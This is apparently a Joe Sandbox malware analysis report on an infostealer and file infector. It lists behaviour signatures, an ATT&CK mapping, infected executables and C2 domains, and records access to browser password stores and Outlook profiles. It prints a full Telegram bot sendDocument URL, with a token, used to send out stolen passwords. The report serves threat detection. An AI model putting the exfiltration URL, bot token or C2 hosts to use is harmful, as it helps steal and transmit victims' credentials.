            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTR
            Source: Yara matchFile source: 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara matchFile source: 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTR
            Source: Yara matchFile source: 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            2
            LSASS Driver
            1
            Abuse Elevation Control Mechanism
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            System Time Discovery
            1
            Taint Shared Content
            1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            2
            LSASS Driver
            1
            Deobfuscate/Decode Files or Information
            11
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager1
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook212
            Process Injection
            4
            Obfuscated Files or Information
            NTDS113
            System Information Discovery
            Distributed Component Object Model11
            Input Capture
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing
            LSA Secrets211
            Security Software Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Timestomp
            Cached Domain Credentials1
            Process Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSync21
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
            Masquerading
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
            Virtualization/Sandbox Evasion
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
            Process Injection
            Network Sniffing1
            System Network Configuration Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588133 Sample: SABXJ1B5c8.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 38 reallyfreegeoip.org 2->38 40 api.telegram.org 2->40 42 16 other IPs or domains 2->42 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 66 11 other signatures 2->66 7 armsvc.exe 1 2->7         started        12 SABXJ1B5c8.exe 3 2->12         started        14 elevation_service.exe 2->14         started        16 18 other processes 2->16 signatures3 62 Tries to detect the country of the analysis system (by using the IP) 38->62 64 Uses the Telegram API (likely for C&C communication) 40->64 process4 dnsIp5 50 przvgke.biz 72.52.178.23, 49718, 80 LIQUIDWEBUS United States 7->50 52 lpuegx.biz 82.112.184.197, 49722, 49813, 49942 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 7->52 54 4 other IPs or domains 7->54 22 C:\Windows\System32\wbengine.exe, PE32+ 7->22 dropped 24 C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ 7->24 dropped 26 C:\Windows\System32\vds.exe, PE32+ 7->26 dropped 34 134 other malicious files 7->34 dropped 72 Drops executable to a common third party application directory 7->72 74 Infects executable files (exe, dll, sys, html) 7->74 28 C:\Windows\System32\snmptrap.exe, PE32+ 12->28 dropped 30 C:\Windows\System32\msiexec.exe, PE32+ 12->30 dropped 32 C:\Windows\System32\msdtc.exe, PE32+ 12->32 dropped 36 14 other malicious files 12->36 dropped 76 Binary is likely a compiled AutoIt script file 12->76 78 Writes to foreign memory regions 12->78 80 Maps a DLL or memory area into another process 12->80 82 Switches to a custom stack to bypass stack traces 12->82 18 RegSvcs.exe 12->18         started        84 Found direct / indirect Syscall (likely to bypass EDR) 14->84 86 Creates files inside the volume driver (system volume information) 16->86 88 Contains functionality to behave differently if execute on a Russian/Kazak computer 16->88 file6 signatures7 process8 dnsIp9 44 api.telegram.org 149.154.167.220, 443, 49711 TELEGRAMRU United Kingdom 18->44 46 checkip.dyndns.com 158.101.44.242, 49705, 80 ORACLE-BMC-31898US United States 18->46 48 reallyfreegeoip.org 104.21.64.1, 443, 49706 CLOUDFLARENETUS United States 18->48 68 Tries to steal Mail credentials (via file / registry access) 18->68 70 Tries to harvest and steal browser information (history, passwords, etc) 18->70 signatures10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SABXJ1B5c8.exe68%VirustotalBrowse
            SABXJ1B5c8.exe84%ReversingLabsWin32.Virus.Expiro
            SABXJ1B5c8.exe100%AviraW32/Infector.Gen
            SABXJ1B5c8.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
            C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://xml.org/sax/properties/lexical-handlerhttp://xml.org/sax/features/namespace-prefixeshttp://xm0%Avira URL Cloudsafe
            http://54.244.188.177/t100%Avira URL Cloudmalware
            http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODYwMDA0100%Avira URL Cloudmalware
            http://ww12.przvgke.biz/sbjeah?usid=27&utid=10450772717100%Avira URL Cloudmalware
            http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVk100%Avira URL Cloudmalware
            http://schemas.micrXX0%Avira URL Cloudsafe
            http://54.244.188.177/xifbrctmnvq100%Avira URL Cloudmalware
            http://54.244.188.177/100%Avira URL Cloudmalware
            http://54.244.188.177/f100%Avira URL Cloudmalware
            http://18.141.10.107/dawajiqtqrkbbpd0%Avira URL Cloudsafe
            http://54.244.188.177/illjjcn100%Avira URL Cloudmalware
            http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            przvgke.biz
            72.52.178.23
            truefalse
              high
              ssbzmoy.biz
              18.141.10.107
              truefalse
                high
                knjghuig.biz
                18.141.10.107
                truefalse
                  high
                  vjaxhpbji.biz
                  82.112.184.197
                  truefalse
                    high
                    pywolwnvd.biz
                    54.244.188.177
                    truefalse
                      high
                      reallyfreegeoip.org
                      104.21.64.1
                      truefalse
                        high
                        checkip.dyndns.com
                        158.101.44.242
                        truefalse
                          high
                          cvgrf.biz
                          54.244.188.177
                          truefalse
                            high
                            lpuegx.biz
                            82.112.184.197
                            truefalse
                              high
                              084725.parkingcrew.net
                              13.248.148.254
                              truefalse
                                high
                                xlfhhhm.biz
                                47.129.31.212
                                truefalse
                                  high
                                  npukfztj.biz
                                  44.221.84.105
                                  truefalse
                                    high
                                    api.telegram.org
                                    149.154.167.220
                                    truefalse
                                      high
                                      zlenh.biz
                                      unknown
                                      unknownfalse
                                        high
                                        checkip.dyndns.org
                                        unknown
                                        unknownfalse
                                          high
                                          uhxqin.biz
                                          unknown
                                          unknownfalse
                                            high
                                            ww12.przvgke.biz
                                            unknown
                                            unknowntrue
                                              unknown
                                              anpmnmxo.biz
                                              unknown
                                              unknownfalse
                                                high
                                                NameMaliciousAntivirus DetectionReputation
                                                https://reallyfreegeoip.org/xml/8.46.123.189false
                                                  high
                                                  http://vjaxhpbji.biz/rgnicitetktmnuugfalse
                                                    high
                                                    http://lpuegx.biz/jnemakkqdmxsfalse
                                                      high
                                                      http://przvgke.biz/sbjeahfalse
                                                        high
                                                        http://lpuegx.biz/xurifalse
                                                          high
                                                          https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.189false
                                                            high
                                                            http://checkip.dyndns.org/false
                                                              high
                                                              http://ssbzmoy.biz/dawajiqtqrkbbpdfalse
                                                                high
                                                                http://vjaxhpbji.biz/bcwwcxayhuafalse
                                                                  high
                                                                  http://knjghuig.biz/ebncgqfalse
                                                                    high
                                                                    http://pywolwnvd.biz/lfsgndokapxyhwfalse
                                                                      high
                                                                      http://npukfztj.biz/brsjohajbqjfalse
                                                                        high
                                                                        http://cvgrf.biz/kmpiafalse
                                                                          high
                                                                          http://knjghuig.biz/wmfptllhfalse
                                                                            high
                                                                            http://pywolwnvd.biz/uljtmxfalse
                                                                              high
                                                                              http://przvgke.biz/yjxlnfalse
                                                                                high
                                                                                http://cvgrf.biz/xifbrctmnvqfalse
                                                                                  high
                                                                                  http://pywolwnvd.biz/illjjcnfalse
                                                                                    high
                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                    https://api.telegram.orgRegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.telegram.org/botRegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881armsvc.exe, 00000002.00000003.2476088254.00000000007B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://xml.org/sax/properties/lexical-handlerhttp://xml.org/sax/features/namespace-prefixeshttp://xmOcPubMgr.exe.2.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://ww12.przvgke.biz/sbjeah?usid=27&utid=10450772717armsvc.exe, 00000002.00000003.2369732741.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            http://18.141.10.107/armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.000000000092E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2059203379.000000000092F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.openssl.org/support/faq.htmlofficesvcmgr.exe.2.drfalse
                                                                                                high
                                                                                                http://54.244.188.177/tarmsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                http://54.244.188.177/xifbrctmnvqarmsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilithmsedge_proxy.exe.2.drfalse
                                                                                                  high
                                                                                                  http://checkip.dyndns.org/qRegSvcs.exe, 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://reallyfreegeoip.orgRegSvcs.exe, 00000011.00000002.2869998704.00000000026A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://checkip.dyndns.comRegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.micrXXAppVClient.exe, 00000007.00000002.1596296692.0000000000554000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595419974.000000000053C000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595705403.0000000000544000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595229479.0000000000535000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.openssl.org/support/faq.htmlerrorofficesvcmgr.exe.2.drfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000011.00000002.2869998704.0000000002601000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaEofficesvcmgr.exe.2.drfalse
                                                                                                              high
                                                                                                              http://54.244.188.177/armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1817901404.0000000000937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              unknown
                                                                                                              http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVkarmsvc.exe, armsvc.exe, 00000002.00000003.2117513572.0000000000969000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              unknown
                                                                                                              https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://crash-reports.mozilla.com/submit?id=armsvc.exe, 00000002.00000003.2476007253.00000000007B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1armsvc.exe, 00000002.00000003.2476088254.00000000007B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://54.244.188.177/farmsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    unknown
                                                                                                                    http://checkip.dyndns.orgRegSvcs.exe, 00000011.00000002.2869998704.0000000002674000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://pcnatrk.net/track.armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://18.141.10.107/dawajiqtqrkbbpdarmsvc.exe, 00000002.00000003.1841325867.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODYwMDA0armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        unknown
                                                                                                                        https://reallyfreegeoip.orgRegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.winimage.com/zLibDllarmsvc.exe, 00000002.00000003.1934226332.0000000002000000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://54.244.188.177/illjjcnarmsvc.exe, 00000002.00000003.1817901404.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            unknown
                                                                                                                            http://api.telegram.orgRegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsidofficesvcmgr.exe.2.drfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://api.telegram.org/bot-/sendDocument?chat_id=RegSvcs.exe, 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffmsedge_proxy.exe.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.bizarmsvc.exe, 00000002.00000003.2116959373.0000000002010000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2122593748.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs
                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    149.154.167.220
                                                                                                                                    api.telegram.orgUnited Kingdom
                                                                                                                                    62041TELEGRAMRUfalse
                                                                                                                                    72.52.178.23
                                                                                                                                    przvgke.bizUnited States
                                                                                                                                    32244LIQUIDWEBUSfalse
                                                                                                                                    13.248.148.254
                                                                                                                                    084725.parkingcrew.netUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    44.221.84.105
                                                                                                                                    npukfztj.bizUnited States
                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                    54.244.188.177
                                                                                                                                    pywolwnvd.bizUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    104.21.64.1
                                                                                                                                    reallyfreegeoip.orgUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    158.101.44.242
                                                                                                                                    checkip.dyndns.comUnited States
                                                                                                                                    31898ORACLE-BMC-31898USfalse
                                                                                                                                    82.112.184.197
                                                                                                                                    vjaxhpbji.bizRussian Federation
                                                                                                                                    43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                    18.141.10.107
                                                                                                                                    ssbzmoy.bizUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                    Analysis ID:1588133
                                                                                                                                    Start date and time:2025-01-10 21:39:17 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 14m 10s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:30
                                                                                                                                    Number of new started drivers analysed:3
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
